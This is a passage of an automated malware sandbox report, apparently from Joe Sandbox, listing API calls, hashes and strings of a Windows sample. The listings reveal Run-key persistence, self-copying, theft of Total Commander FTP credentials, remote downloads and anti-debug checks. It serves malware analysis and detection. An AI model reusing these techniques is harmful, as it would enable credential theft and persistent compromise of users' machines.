                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
                          • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
                          • SetForegroundWindow.USER32(00000000), ref: 0040A088
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ForegroundWindow$CreateInstance
                          • String ID:
                          • API String ID: 2498160819-0
                          • Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                          • Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
                          • Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                          • Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00406CCF
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                          • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                          • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                          • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95

                          Control-flow Graph (graph image not reproduced in text; executed/not-executed edge list omitted)
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph (graph image not reproduced in text; executed/not-executed edge list omitted)
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                          Control-flow Graph (graph image not reproduced in text; executed/not-executed edge list omitted)
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph (graph image not reproduced in text; executed/not-executed edge list omitted)
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
